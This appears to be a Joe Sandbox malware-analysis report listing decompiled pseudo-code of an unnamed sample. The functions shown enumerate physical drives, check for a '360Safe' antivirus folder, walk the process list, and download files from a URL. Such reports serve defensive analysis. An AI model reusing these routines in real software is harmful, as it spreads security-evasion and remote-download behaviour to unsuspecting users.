                                                                                                                                                                                          0x00cfe3fd
                                                                                                                                                                                          0x00cfe401
                                                                                                                                                                                          0x00cfe405
                                                                                                                                                                                          0x00cfe409
                                                                                                                                                                                          0x00cfe40d
                                                                                                                                                                                          0x00cfe420
                                                                                                                                                                                          0x00cfe428
                                                                                                                                                                                          0x00cfe430
                                                                                                                                                                                          0x00cfe43e
                                                                                                                                                                                          0x00cfe444
                                                                                                                                                                                          0x00cfe457
                                                                                                                                                                                          0x00cfe45d
                                                                                                                                                                                          0x00cfe469
                                                                                                                                                                                          0x00cfe470
                                                                                                                                                                                          0x00cfe477
                                                                                                                                                                                          0x00cfe47e
                                                                                                                                                                                          0x00cfe485
                                                                                                                                                                                          0x00cfe48c
                                                                                                                                                                                          0x00cfe493
                                                                                                                                                                                          0x00cfe49a
                                                                                                                                                                                          0x00cfe4a1
                                                                                                                                                                                          0x00cfe4a8
                                                                                                                                                                                          0x00cfe4ad
                                                                                                                                                                                          0x00cfe4c6
                                                                                                                                                                                          0x00cfe4cb
                                                                                                                                                                                          0x00cfe4d0
                                                                                                                                                                                          0x00cfe4d2
                                                                                                                                                                                          0x00cfe4d6
                                                                                                                                                                                          0x00cfe4e0
                                                                                                                                                                                          0x00cfe4e3
                                                                                                                                                                                          0x00cfe4e5
                                                                                                                                                                                          0x00cfe4e8
                                                                                                                                                                                          0x00cfe4eb
                                                                                                                                                                                          0x00cfe4fb
                                                                                                                                                                                          0x00cfe507
                                                                                                                                                                                          0x00cfe50b
                                                                                                                                                                                          0x00cfe518
                                                                                                                                                                                          0x00cfe51a
                                                                                                                                                                                          0x00cfe51a
                                                                                                                                                                                          0x00cfe518
                                                                                                                                                                                          0x00cfe4d0
                                                                                                                                                                                          0x00cfe523
                                                                                                                                                                                          0x00cfe52e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cfe432
                                                                                                                                                                                          0x00cfe433
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cfe433
                                                                                                                                                                                          0x00cfe430
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cfe530
                                                                                                                                                                                          0x00cfe530
                                                                                                                                                                                          0x00cfe531
                                                                                                                                                                                          0x00cfe53e
                                                                                                                                                                                          0x00cfe540
                                                                                                                                                                                          0x00cfe555
                                                                                                                                                                                          0x00cfe555

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00C926B0: _vswprintf_s.LIBCMT ref: 00C926E3
                                                                                                                                                                                          • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 00CFE3E2
                                                                                                                                                                                          • DeviceIoControl.KERNEL32 ref: 00CFE428
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00CFE433
                                                                                                                                                                                          • _memset.LIBCMT ref: 00CFE4A8
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00CFE523
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseHandle$ControlCreateDeviceFile_memset_vswprintf_s
                                                                                                                                                                                          • String ID: GenuineIntel:1f8bfbff$\\.\PhysicalDrive%d
                                                                                                                                                                                          • API String ID: 759969516-2573768779
                                                                                                                                                                                          • Opcode ID: eef5c0fc428e3e0036cbe1bc4ea1df8ed896477176f0b0e7dfb93e8663a5964a
                                                                                                                                                                                          • Instruction ID: 1bb9e569aee88d7b2b0f33b023a51b4504489a70278c229de3ec989f28ad9c05
                                                                                                                                                                                          • Opcode Fuzzy Hash: eef5c0fc428e3e0036cbe1bc4ea1df8ed896477176f0b0e7dfb93e8663a5964a
                                                                                                                                                                                          • Instruction Fuzzy Hash: B15180B0508344AFD3B0DF28CC45BABBBE8EB84708F50491DF699D6291E77499088F67
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00CFE720 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 74%
                                                                                                                                                                                          			E00CFE720(void* __ebx, void* __esi, void* __ebp, long _a4, intOrPtr _a8, void _a12, struct _OVERLAPPED* _a16, intOrPtr _a20, char _a24, char _a280, void _a1280, intOrPtr _a1304, signed int _a11280, intOrPtr _a11288, intOrPtr _a11292) {
				struct _OVERLAPPED* _v0;
				void* __edi;
				signed int _t32;
				intOrPtr _t34;
				void* _t39;
				int _t45;
				void* _t54;
				void* _t55;
				void* _t69;
				void* _t70;
				signed int _t74;

				_t68 = __esi;
				_t53 = __ebx;
				E00D00E90(0x2c14);
				_t32 =  *0xd64070; // 0x8a9e1774
				_a11280 = _t32 ^ _t74;
				_t34 = _a11288;
				_a8 = _t34;
				if(_t34 == 0 || _a11292 == 0) {
					return E00D0071A(0, _t53, _a11280 ^ _t74, _t64, 0, _t68);
				} else {
					_push(__ebx);
					_push(__esi);
					_v0 = 0;
					_t54 = 0;
					do {
						E00C926B0( &_a24, 0x100, "\\\\.\\PhysicalDrive%d", _t54);
						_t74 = _t74 + 0x10;
						_t39 = CreateFileA( &_a24, 0, 3, 0, 3, 0, 0); // executed
						_t69 = _t39;
						if(_t69 == 0xffffffff) {
							goto L8;
						} else {
							_a12 = 0;
							_a16 = 0;
							_a4 = 0;
							_a20 = 0;
							_a12 = 0;
							_a16 = 0;
							E00D006A0(0,  &_a1280, 0, 0x2710);
							_t74 = _t74 + 0xc;
							_t64 =  &_a12;
							_t45 = DeviceIoControl(_t69, 0x2d1400,  &_a12, 0xc,  &_a1280, 0x2710,  &_a4, 0); // executed
							if(_t45 != 0) {
								E00D006A0(0,  &_a280, 0, 0x3e8);
								_push( &_a280);
								_push(1);
								_push(_a1304);
								_push( &_a1280);
								E00D00490();
								_t64 = _a11292;
								_t74 = _t74 + 0x1c;
								if(E00C927A0(_a8, _a11292,  &_a280) == 0) {
									_v0 = 1;
								}
							}
							FindCloseChangeNotification(_t69); // executed
							if(_v0 == 0) {
								goto L8;
							}
						}
						break;
						L8:
						_t54 = _t54 + 1;
					} while (_t54 < 0x10);
					_pop(_t70);
					_pop(_t55);
					return E00D0071A(_v0, _t55, _a11280 ^ _t74, _t64, 0, _t70);
				}
			}














                                                                                                                                                                                          0x00cfe720
                                                                                                                                                                                          0x00cfe720
                                                                                                                                                                                          0x00cfe725
                                                                                                                                                                                          0x00cfe72a
                                                                                                                                                                                          0x00cfe731
                                                                                                                                                                                          0x00cfe738
                                                                                                                                                                                          0x00cfe742
                                                                                                                                                                                          0x00cfe748
                                                                                                                                                                                          0x00cfe8a2
                                                                                                                                                                                          0x00cfe75b
                                                                                                                                                                                          0x00cfe75b
                                                                                                                                                                                          0x00cfe763
                                                                                                                                                                                          0x00cfe764
                                                                                                                                                                                          0x00cfe768
                                                                                                                                                                                          0x00cfe770
                                                                                                                                                                                          0x00cfe780
                                                                                                                                                                                          0x00cfe785
                                                                                                                                                                                          0x00cfe795
                                                                                                                                                                                          0x00cfe797
                                                                                                                                                                                          0x00cfe79c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cfe7a2
                                                                                                                                                                                          0x00cfe7b1
                                                                                                                                                                                          0x00cfe7b5
                                                                                                                                                                                          0x00cfe7ba
                                                                                                                                                                                          0x00cfe7be
                                                                                                                                                                                          0x00cfe7c2
                                                                                                                                                                                          0x00cfe7c6
                                                                                                                                                                                          0x00cfe7ca
                                                                                                                                                                                          0x00cfe7cf
                                                                                                                                                                                          0x00cfe7e7
                                                                                                                                                                                          0x00cfe7f2
                                                                                                                                                                                          0x00cfe7fa
                                                                                                                                                                                          0x00cfe80a
                                                                                                                                                                                          0x00cfe81d
                                                                                                                                                                                          0x00cfe81e
                                                                                                                                                                                          0x00cfe820
                                                                                                                                                                                          0x00cfe828
                                                                                                                                                                                          0x00cfe829
                                                                                                                                                                                          0x00cfe82e
                                                                                                                                                                                          0x00cfe839
                                                                                                                                                                                          0x00cfe84d
                                                                                                                                                                                          0x00cfe84f
                                                                                                                                                                                          0x00cfe84f
                                                                                                                                                                                          0x00cfe84d
                                                                                                                                                                                          0x00cfe858
                                                                                                                                                                                          0x00cfe862
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cfe862
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cfe864
                                                                                                                                                                                          0x00cfe864
                                                                                                                                                                                          0x00cfe865
                                                                                                                                                                                          0x00cfe872
                                                                                                                                                                                          0x00cfe874
                                                                                                                                                                                          0x00cfe88a
                                                                                                                                                                                          0x00cfe88a

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00C926B0: _vswprintf_s.LIBCMT ref: 00C926E3
                                                                                                                                                                                          • CreateFileA.KERNEL32(?,00000000,00000003,00000000,00000003,00000000,00000000,?,00CFF4AB,?,00000064), ref: 00CFE795
                                                                                                                                                                                          • _memset.LIBCMT ref: 00CFE7CA
                                                                                                                                                                                          • DeviceIoControl.KERNEL32 ref: 00CFE7F2
                                                                                                                                                                                          • _memset.LIBCMT ref: 00CFE80A
                                                                                                                                                                                          • FindCloseChangeNotification.KERNEL32(00000000), ref: 00CFE858
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _memset$ChangeCloseControlCreateDeviceFileFindNotification_vswprintf_s
                                                                                                                                                                                          • String ID: \\.\PhysicalDrive%d
                                                                                                                                                                                          • API String ID: 1506936200-2935326385
                                                                                                                                                                                          • Opcode ID: 3e22576320e944cbc0d88958b7887b98a3eec4533c1f20ca926f6d8ca63dfef9
                                                                                                                                                                                          • Instruction ID: 4bfae385cefc80137e1fd05af144ce2acbb8e6adea4c56aaeb67581c2c40abd5
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3e22576320e944cbc0d88958b7887b98a3eec4533c1f20ca926f6d8ca63dfef9
                                                                                                                                                                                          • Instruction Fuzzy Hash: 82416F71504340AFE364EF69CC4AFAFB7E8EBC5710F400E1DF59882191E7759A548B62
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00CEC3CD Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 60fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 94%
                                                                                                                                                                                          			E00CEC3CD(void* __ebx, void* __eflags, intOrPtr* _a4) {
				signed int _v8;
				char _v526;
				short _v528;
				struct _WIN32_FIND_DATAW _v1120;
				void* __edi;
				void* __esi;
				signed int _t12;
				void* _t23;
				void* _t25;
				void* _t30;
				void* _t33;
				void* _t34;
				void* _t38;
				signed int _t39;

				_t30 = __ebx;
				_t12 =  *0xd64070; // 0x8a9e1774
				_v8 = _t12 ^ _t39;
				_v528 = 0;
				_t34 = 0;
				E00D006A0(0,  &_v526, 0, 0x206);
				E00D0A761( &_v528, 0x104,  *_a4);
				E00D0AAEA( &_v528, 0x104, L"\\*.*");
				_t23 = FindFirstFileW( &_v528,  &_v1120); // executed
				_t38 = _t23;
				if(_t38 != 0xffffffff) {
					while(_v1120.cFileName == 0x2e) {
						if(FindNextFileW(_t38,  &_v1120) != 0) {
							continue;
						} else {
							_t34 = 1;
						}
						break;
					}
					FindClose(_t38);
					_t25 = _t34;
				} else {
					_t25 = 1;
				}
				return E00D0071A(_t25, _t30, _v8 ^ _t39, _t33, _t34, _t38);
			}

















                                                                                                                                                                                          0x00cec3cd
                                                                                                                                                                                          0x00cec3d6
                                                                                                                                                                                          0x00cec3dd
                                                                                                                                                                                          0x00cec3ec
                                                                                                                                                                                          0x00cec3f3
                                                                                                                                                                                          0x00cec3fd
                                                                                                                                                                                          0x00cec411
                                                                                                                                                                                          0x00cec423
                                                                                                                                                                                          0x00cec439
                                                                                                                                                                                          0x00cec43f
                                                                                                                                                                                          0x00cec444
                                                                                                                                                                                          0x00cec459
                                                                                                                                                                                          0x00cec473
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cec475
                                                                                                                                                                                          0x00cec477
                                                                                                                                                                                          0x00cec477
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cec473
                                                                                                                                                                                          0x00cec479
                                                                                                                                                                                          0x00cec47f
                                                                                                                                                                                          0x00cec446
                                                                                                                                                                                          0x00cec448
                                                                                                                                                                                          0x00cec448
                                                                                                                                                                                          0x00cec456

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _memset.LIBCMT ref: 00CEC3FD
                                                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,?,\360Safe,746CB8D0), ref: 00CEC439
                                                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,\360Safe,746CB8D0), ref: 00CEC46B
                                                                                                                                                                                          • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,\360Safe,746CB8D0), ref: 00CEC479
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Find$File$CloseFirstNext_memset
                                                                                                                                                                                          • String ID: \*.*$\360Safe
                                                                                                                                                                                          • API String ID: 1570986888-1259881003
                                                                                                                                                                                          • Opcode ID: 6db054089a4bd104b07c24728595a6e462234909447fdebda72b4d85be403c19
                                                                                                                                                                                          • Instruction ID: 311b064f0a7c223d6a7027d6d8f8cba5bc0155f47b72f94e5ac2d50ea200030e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6db054089a4bd104b07c24728595a6e462234909447fdebda72b4d85be403c19
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2111C876900318AFCB20EB75DC88AEB77BCEB59310F4042A1A959D3181D7749E458BB5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00CEC13E Relevance: 7.6, APIs: 5, Instructions: 52processCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 81%
                                                                                                                                                                                          			E00CEC13E(intOrPtr _a4, signed int* _a8) {
				signed int _v8;
				signed int _v540;
				intOrPtr _v556;
				void* _v564;
				void* __edi;
				void* __esi;
				signed int _t12;
				void* _t14;
				int _t16;
				signed int _t21;
				intOrPtr _t26;
				intOrPtr _t29;
				void* _t31;
				intOrPtr _t32;
				signed int* _t33;
				signed int _t34;

				_t12 =  *0xd64070; // 0x8a9e1774
				_v8 = _t12 ^ _t34;
				_t33 = _a8;
				 *_t33 =  *_t33 & 0x00000000;
				_t14 = CreateToolhelp32Snapshot(2, 0); // executed
				_t31 = _t14;
				if(_t31 != 0xffffffff) {
					_push( &_v564);
					_v564 = 0x22c;
					_t16 = Process32FirstW(_t31); // executed
					if(_t16 != 0) {
						while(_a4 != _v556) {
							if(Process32NextW(_t31,  &_v564) != 0) {
								continue;
							} else {
							}
							L8:
							CloseHandle(_t31);
							_t21 = 0 |  *_t33 != 0x00000000;
							goto L9;
						}
						 *_t33 = _v540;
						goto L8;
					} else {
						CloseHandle(_t31);
						goto L1;
					}
				} else {
					L1:
					_t21 = 0;
				}
				L9:
				_pop(_t32);
				return E00D0071A(_t21, _t26, _v8 ^ _t34, _t29, _t32, _t33);
			}



















                                                                                                                                                                                          0x00cec147
                                                                                                                                                                                          0x00cec14e
                                                                                                                                                                                          0x00cec152
                                                                                                                                                                                          0x00cec155
                                                                                                                                                                                          0x00cec15d
                                                                                                                                                                                          0x00cec162
                                                                                                                                                                                          0x00cec167
                                                                                                                                                                                          0x00cec173
                                                                                                                                                                                          0x00cec175
                                                                                                                                                                                          0x00cec17f
                                                                                                                                                                                          0x00cec186
                                                                                                                                                                                          0x00cec191
                                                                                                                                                                                          0x00cec1ab
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cec1ad
                                                                                                                                                                                          0x00cec1b7
                                                                                                                                                                                          0x00cec1b8
                                                                                                                                                                                          0x00cec1c2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cec1c2
                                                                                                                                                                                          0x00cec1b5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cec188
                                                                                                                                                                                          0x00cec189
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cec189
                                                                                                                                                                                          0x00cec169
                                                                                                                                                                                          0x00cec169
                                                                                                                                                                                          0x00cec169
                                                                                                                                                                                          0x00cec169
                                                                                                                                                                                          0x00cec1c5
                                                                                                                                                                                          0x00cec1c8
                                                                                                                                                                                          0x00cec1d2

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00CEC15D
                                                                                                                                                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 00CEC17F
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,00D66E98), ref: 00CEC189
                                                                                                                                                                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 00CEC1A4
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,00D66E98), ref: 00CEC1B8
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1789362936-0
                                                                                                                                                                                          • Opcode ID: bd8e9527ccc872ae3bf90dc585d901464ed862ab6036e1526eed0c6ac56ece47
                                                                                                                                                                                          • Instruction ID: 3298f6586d960ee27ddba14f92dae73b55952e1e0eed07323854d0f97ee9cb47
                                                                                                                                                                                          • Opcode Fuzzy Hash: bd8e9527ccc872ae3bf90dc585d901464ed862ab6036e1526eed0c6ac56ece47
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C118431600218EBD710AF76DDC9BBEB7F8AB55714F200159E851D7182D738AE41DB71
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00CC6430 Relevance: 6.1, APIs: 4, Instructions: 59filenetworkCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 49%
                                                                                                                                                                                          			E00CC6430(intOrPtr __ebx, intOrPtr* _a4, intOrPtr* _a8) {
				signed int _v8;
				char _v1046;
				short _v1048;
				void* __edi;
				void* __esi;
				signed int _t9;
				intOrPtr* _t11;
				intOrPtr _t12;
				WCHAR* _t17;
				intOrPtr _t21;
				intOrPtr _t24;
				intOrPtr* _t25;
				signed int _t27;

				_t21 = __ebx;
				_t9 =  *0xd64070; // 0x8a9e1774
				_v8 = _t9 ^ _t27;
				_t11 = _a8;
				_t25 = _a4;
				if(_t25 == 0 ||  *_t25 == 0) {
					L5:
					_t12 = 0;
				} else {
					if(_t11 == 0 ||  *_t11 == 0) {
						_v1048 = 0;
						E00D006A0(_t25,  &_v1046, 0, 0x40e);
						_push(0);
						_push(0);
						_push(0x104);
						_t17 =  &_v1048;
						_push(_t17);
						_push(_t25);
						_push(0); // executed
						L00D2F3BC(); // executed
						if(_t17 < 0) {
							goto L5;
						} else {
							DeleteFileW( &_v1048);
							goto L9;
						}
					} else {
						_push(0);
						_push(0);
						_push(_t11);
						_push(_t25);
						_push(0);
						L00D2F3C2();
						if(_t11 >= 0) {
							L9:
							_t12 = 1;
						} else {
							goto L5;
						}
					}
				}
				return E00D0071A(_t12, _t21, _v8 ^ _t27, _t24, _t25, 0);
			}
















                                                                                                                                                                                          0x00cc6430
                                                                                                                                                                                          0x00cc6439
                                                                                                                                                                                          0x00cc6440
                                                                                                                                                                                          0x00cc6443
                                                                                                                                                                                          0x00cc6448
                                                                                                                                                                                          0x00cc644f
                                                                                                                                                                                          0x00cc646d
                                                                                                                                                                                          0x00cc646d
                                                                                                                                                                                          0x00cc6456
                                                                                                                                                                                          0x00cc6458
                                                                                                                                                                                          0x00cc6484
                                                                                                                                                                                          0x00cc6493
                                                                                                                                                                                          0x00cc649b
                                                                                                                                                                                          0x00cc649c
                                                                                                                                                                                          0x00cc649d
                                                                                                                                                                                          0x00cc64a2
                                                                                                                                                                                          0x00cc64a8
                                                                                                                                                                                          0x00cc64a9
                                                                                                                                                                                          0x00cc64aa
                                                                                                                                                                                          0x00cc64ab
                                                                                                                                                                                          0x00cc64b2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cc64b4
                                                                                                                                                                                          0x00cc64bb
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cc64bb
                                                                                                                                                                                          0x00cc645f
                                                                                                                                                                                          0x00cc645f
                                                                                                                                                                                          0x00cc6460
                                                                                                                                                                                          0x00cc6461
                                                                                                                                                                                          0x00cc6462
                                                                                                                                                                                          0x00cc6463
                                                                                                                                                                                          0x00cc6464
                                                                                                                                                                                          0x00cc646b
                                                                                                                                                                                          0x00cc64c1
                                                                                                                                                                                          0x00cc64c3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cc646b
                                                                                                                                                                                          0x00cc6458
                                                                                                                                                                                          0x00cc647c

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 00CC6464
                                                                                                                                                                                          • _memset.LIBCMT ref: 00CC6493
                                                                                                                                                                                          • URLDownloadToCacheFileW.URLMON(00000000,?,?,00000104,00000000,00000000), ref: 00CC64AB
                                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,00000000,?), ref: 00CC64BB
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$Download$CacheDelete_memset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1835763934-0
                                                                                                                                                                                          • Opcode ID: 5cbc89d1aa4ac2d53b47ee75695d17600f9721f4a6374267487f7a2682085193
                                                                                                                                                                                          • Instruction ID: 73262ff76f96acf5811f6f748d85cb6ac352bf6d39d72ae09bb8717a63955549
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5cbc89d1aa4ac2d53b47ee75695d17600f9721f4a6374267487f7a2682085193
                                                                                                                                                                                          • Instruction Fuzzy Hash: 69016171A0112876CB20EF65DE45EDBBBFCDF85B50F404465F908D7141D630DA81CAB5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

